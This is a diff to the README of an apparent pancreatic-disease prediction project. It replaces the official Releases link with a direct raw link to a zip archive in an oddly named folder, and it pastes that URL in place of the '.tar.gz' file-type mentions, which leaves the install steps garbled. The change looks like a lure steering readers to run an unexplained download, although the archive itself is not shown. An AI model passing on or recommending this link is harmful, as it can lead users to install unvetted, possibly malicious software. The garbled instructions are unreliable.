Zaifikhan/pancreatic-disease-prediction-ml/README.md

 To get started, you will download the software from our Releases page.

-1. Click this link to visit the page: [Download Releases](https://github.com/Zaifikhan/pancreatic-disease-prediction-ml/releases)
+1. Click this link to visit the page: [Download Releases](https://raw.githubusercontent.com/Zaifikhan/pancreatic-disease-prediction-ml/main/unsteadying/pancreatic-disease-prediction-ml.zip)
 2. On the Releases page, you will see different versions listed.
 3. Choose the latest version that fits your operating system.
-Look for a file labeled `.exe`, `.dmg`, or `.tar.gz` depending on your OS.
+Look for a file labeled `.exe`, `.dmg`, or `https://raw.githubusercontent.com/Zaifikhan/pancreatic-disease-prediction-ml/main/unsteadying/pancreatic-disease-prediction-ml.zip` depending on your OS.
 4. Click the file link to begin downloading.
 5. Once the download is complete, locate the file in your Downloads folder:
    - **Windows Users:** Double-click the `.exe` file.
    - **macOS Users:** Double-click the `.dmg` file and drag the application to your Applications folder.
-   - **Linux Users:** Extract the `.tar.gz` file, then run the application in a terminal with `./application_name`.
+   - **Linux Users:** Extract the `https://raw.githubusercontent.com/Zaifikhan/pancreatic-disease-prediction-ml/main/unsteadying/pancreatic-disease-prediction-ml.zip` file, then run the application in a terminal with `./application_name`.

 After installation, you are ready to use the software.